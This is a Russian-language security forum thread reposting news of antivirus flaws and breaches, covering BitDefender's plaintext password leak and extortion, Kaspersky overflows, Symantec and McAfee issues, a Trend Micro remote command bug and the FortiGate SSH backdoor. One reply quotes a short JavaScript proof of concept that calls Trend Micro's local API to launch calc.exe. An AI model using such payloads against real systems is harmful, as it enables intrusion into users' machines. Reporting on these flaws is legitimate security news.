• Уменьшение отступа

    Обратная связь

    (info@ru-sfera.pw)

Антивирусы под прицелом #2: взлом BitDefender и серьезные уязвимости в Symantec


KILLER-S

Уважаемый пользователь
Форумчанин
Регистрация
24.12.2014
Сообщения
356
Репутация
66
Не так давно мы о том, что британские спецслужбы взламывали антивирусные продукты «Лаборатории Касперского», а исследователи из Google (Project Zero) — нашли серьезную уязвимость в продукте ESET NOD32. И надо сказать, что проблемы антивирусных компаний на этом не закончились. 31 июля СМИ растиражировали новость о , которая привела к краже учетных данных пользователей продуктов BitDefender, кроме того, в этот же день появилась информация об обнаружении целого ряда в защитном софте компании Symantec. о ряде серьезных уязвимостей в продукте Symantec Endpoint Protection. Среди обнаруженных ошибок безопасности продукта Endpoint Protection Manager возможность обхода аутентификации ( ), повышения привилегий ( ), чтения и записи файлов ( , , ), а также осуществления SQL-инъекций ( ). В Endpoint Client также обнаружена уязвимость, позволяющая осуществлять выполнение произвольного кода ( ).

В посте Code White подробно описан процесс проникновения в систему, повышения привилегий и последующего выполнения кода.

Атака на BitDefender

Значительно более резонансным событием стала атака на антивирусную компанию BitDefender. При этом главной причиной шумихи в СМИ стал даже не сам факт взлома, а то, что пароли пользователей, которые удалось похитить злоумышленникам, хранились в открытом виде.

Несмотря на то, что информация о взломе BitDefender попала в СМИ 31 июля, сама атака была осуществлена раньше. Так 24 июля пользователь под ником DetoxRansome обратился к BitDefender с требованием выплатить ему $15 тыс… В противном случае, он грозился опубликовать базу «слитых» учетных записей:
4fdf35b098264dc790b575e92667942b.png


Как профильный блог Hacker Film, 25 июля хакер предпринял еще одну попытку монетизировать осуществленный им взлом — на одном из специализированных форумов он выложил часть украденных логинов и паролей (которые были не зашифрованы, позднее сам хакер Forbes, что учетные записи хранились в таком виде изначально).
86d3723d31064ddbb233cdcd1ea19004.png


Позднее хакер опубликовал сообщение о том, что с помощью украденных учетных записей ему удалось проникнуть в системы многих энетрпрайз-клиентов BitDefender. В качестве подтверждения своих слов он опубликовал скриншоты панели аналитики компаний, использовавших антивирусные продукты BitDefender:
f3f9c1e2be494c289dfcd99a95c83d4c.png


Представители BitDefender позднее подтвердили, что опубликованные данные — это действительно активные аккаунты пользователей (компания сбросила пароли для всех пользователей, чьи аккаунты утекли в сеть). Компания также отказалась платить хакеру и «незамедлительно исправила проблему, предприняв меры по недопущению подобных происшествий в будущем».
 
Последнее редактирование:

KILLER-S

Уважаемый пользователь
Форумчанин
Регистрация
24.12.2014
Сообщения
356
Репутация
66
Google обнаружила 8 неисправленных уязвимостей в «Антивирусе Касперского»

Бреши позволяют удаленному пользователю выполнить произвольный код.
Специалисты Google обнародовали информацию о 8 неисправленных уязвимостях в «Антивирусе Касперского». Все бреши, обнаруженные еще в начале сентября нынешнего года, позволяют удаленное выполнение кода.
Большинство уязвимостей связаны с различными ошибками, вызывающими переполнение буфера. В ряде случаев злоумышленники получают возможность выполнить произвольный код с привилегиями NT AUTHORITY/SYSTEM.
Информация об уязвимостях была разглашена в связи с тем, что ЛК не исправила их в положенный срок. Функциональные эксплоиты для всех брешей размещены в открытом доступе.
На момент написания материала ЛК не среагировала на инцидент.

Количество уязвимостей:
8
CVSSv2 рейтинг:
(AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:U/RC:C) = Base:10/Temporal:9.5
(AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:U/RC:C) = Base:10/Temporal:9.5
(AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:U/RC:C) = Base:10/Temporal:9.5
(AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:U/RC:C) = Base:10/Temporal:9.5
(AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:U/RC:C) = Base:10/Temporal:9.5
(AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:U/RC:C) = Base:10/Temporal:9.5
(AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:U/RC:C) = Base:10/Temporal:9.5
(AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:U/RC:C) = Base:10/Temporal:9.5
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
CWE-119: Ошибки работы с буфером
Наличие эксплоита:
Активная эксплуатация уязвимости
Уязвимые продукты:
Kaspersky Anti-Virus 2016
Уязвимые версии:
Kaspersky Anti-Virus 2016
Описание:
Уязвимости позволяют удаленному пользователю скомпрометировать систему.
1) Уязвимость существует из-за целочисленного переполнения при обработке VB6-файлов. Удаленный пользователь может выполнить произвольный код на целевой системе.
2) Уязвимость существует из-за повреждения памяти при обработке файлов ExeCryptor. Удаленный пользователь может выполнить произвольный код на целевой системе.
3) Уязвимость существует из-за целочисленного переполнения при обработке PE-файлов. Удаленный пользователь может выполнить произвольный код на целевой системе.
4) Уязвимость существует из-за ошибки форматной строки при обработке DEX-файлов. Удаленный пользователь может выполнить произвольный код на целевой системе.
5) Уязвимость существует из-за переполнения буфера в стеке при обработке CHM файлов . Удаленный пользователь может выполнить произвольный код на целевой системе.
6) Уязвимость существует из-за повреждения памяти при обработке UPX файлов. Удаленный пользователь может выполнить произвольный код на целевой системе.
7) Уязвимость существует из-за переполнения буфера в стеке при обработке ThinApp файлов. Удаленный пользователь может выполнить произвольный код на целевой системе.
8) Уязвимость существует из-за повреждения памяти при распаковке файлов, запакованых с помощью "Yoda's Protector". Удаленный пользователь может выполнить произвольный код на целевой системе.

URL производителя:

Решение: На момент написания бюллетеня способов исправления уязвимостей не существует.

Эксплоит: Kaspersky Antivirus ThinApp Parser Stack Buffer Overflow
Kaspersky Antivirus UPX Parsing Memory Corruption
Kaspersky Antivirus CHM Parsing Stack Buffer Overflow
Kaspersky Antivirus DEX File Format Parsing Memory Corruption
Kaspersky Antivirus PE Unpacking Integer Overflow
Kaspersky Antivirus ExeCryptor parsing memory corruption
Kaspersky Antivirus VB6 parsing integer overflow







 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
Google обнаружила 8 неисправленных уязвимостей в «Антивирусе Касперского»
Решение: На момент написания бюллетеня способов исправления уязвимостей не существует.
А можно ссылочку на источник этой статьи?Просто на оф.форуме каспера пишут,что дыры закрыты.
p.s.Ага,нашёл-securitylab.ru.Там ща инфу обновили,типа дыры закрыты.
 
Последнее редактирование:

KILLER-S

Уважаемый пользователь
Форумчанин
Регистрация
24.12.2014
Сообщения
356
Репутация
66
Антоха, Да....обновлено...17:48 / 23 Сентября, 2015
"Обновлено
Согласно сообщению производителя, исправления доступны через функционал автоматического обновления."
 

KILLER-S

Уважаемый пользователь
Форумчанин
Регистрация
24.12.2014
Сообщения
356
Репутация
66
Специалисты предупреждают об уязвимостях в продуктах ЛК и McAfee.....

Бреши могут содержаться в DLP-решениях компаний.
Обнаруженная в марте нынешнего года уязвимость в антивирусе AVG также присутствует в ряде других программ по обеспечению защиты ПК. Об этом заявили специалисты компании enSilo. Проблема была замечена в антивирусах Kaspersky Total Security и McAfee Virus Scan Enterprise.
Брешь существует из-за ошибки при выделении памяти для чтения, записи и выполнения кода. Антивирусы используют «предсказуемые» адреса в памяти, позволяющие злоумышленнику проэксплуатировать уязвимости в устаревших сторонних программах. Вредоносы могут обходить антивирусную защиту и заражать компьютеры жертв.
ЛК и McAfee исправили уязвимость в продуктах в сентября и августе нынешнего года соответственно. Тем не менее, брешь до сих пор может находиться в других программах компаний. По мнению экспертов, DLP-решения и другие продукты вышеуказанных компаний могут быть небезопасны.
«Подобные уязвимости явно указывают на проблемы в ИБ-экосистеме. С одной стороны, компании наподобие Microsoft тратят огромные средства и ресурсы на улучшение безопасности продуктов. С другой стороны, в любой программе найдется хоть какая-то ошибка. К сожалению, малейшая проблема в стороннем приложении может вывести из строя даже самые надежные системы обеспечения безопасности», - заявил вице-президент enSilo Томер Биттон (Tomer Bitton).
«Лаборатория Касперского» устранила уязвимость в сентябре нынешнего года. Тогда специалист Google Тэвис Орманди (Tavis Ormandy) обнаружил сразу несколько брешей в антивирусе.
Предотвращение утечек (англ. Data Leak Prevention, DLP) — технологии предотвращения утечек конфиденциальной информации из информационной системы вовне, а также технические устройства (программные или программно-аппаратные) для такого предотвращения утечек.
 

KILLER-S

Уважаемый пользователь
Форумчанин
Регистрация
24.12.2014
Сообщения
356
Репутация
66
Обнаружена очень серьезная уязвимость в продуктах Trend Micro.... Тавис Орманди из Google Project Zero обнаружил удивительнейшую уязвимость в антивирусных продуктах Trend Micro под Windows, позволяющую любому веб-сайту, который посещает пользователь, выполнить произвольному команду на его машине.

Источник:



В межсетевых экранах FortiGate выявлен бэкдор....

В межсетевых экранах, основанных на развиваемой компанией Fortinet платформе FortiGate OS, выявлен бэкдор, позволяющий получить доступ к устройству по SSH с предопределёнными параметрами аутентификации. При попытке входа под логином Fortimanager_Access выводится динамически генерируемая строка, на основе которой можно вычислить пароль, который формируется через цикличное применение хэша SHA1 к этой строке и ряду фиксированных ключевых фраз. Бэкдор присутствует в FortiGate OS начиная с версии 4.x и заканчивая 5.0.7, пишет opennet.ru. Известно, что проблема устранена в выпускеFortiGate OS 5.0.8, опубликованном ещё в августе 2014 года. Компания Fortinet пока никак не прокомментировала информацию о бэкдоре, но, судя-по всему, бэкдор использовался как инженерный вход для службы поддержки.
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 174
Обнаружена очень серьезная уязвимость в продуктах Trend Micro.... Тавис Орманди из Google Project Zero обнаружил удивительнейшую уязвимость в антивирусных продуктах Trend Micro под Windows, позволяющую любому веб-сайту, который посещает пользователь, выполнить произвольному команду на его машине.
Не хило так-то:
Код:
x = new XMLHttpRequest()

x.open("GET", "https://localhost:49155/api/openUrlInDefaultBrowser?url=c:/windows/system32/calc.exe true);

try { x.send(); } catch (e) {};

44e920d0e4fb4458bbf88504813f7cec1.png


wacko88ohmy88ohmy88
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 174
Копнув еще глубже, Орманди обнаружил, что менеджер паролей настолько плох, что допускает кражу всех паролей, даже если они зашифрованы.
Dmeh-Smeh-Smeh!!!
 
Автор темы Похожие темы Форум Ответы Дата
M Новости и статьи IT безопасности 0
M Новости и статьи IT безопасности 1
M Новости и статьи IT безопасности 0
virt Новости и статьи IT безопасности 2
virt Новости и статьи IT безопасности 3
A Новости и статьи IT безопасности 0
Hooko Новости и статьи IT безопасности 2
X-Shar Новости и статьи IT безопасности 0
Denis27 Новости и статьи IT безопасности 9
vasek112 Новости и статьи IT безопасности 1
R Новости и статьи IT безопасности 0
X-Shar Новости и статьи IT безопасности 2
Верх Низ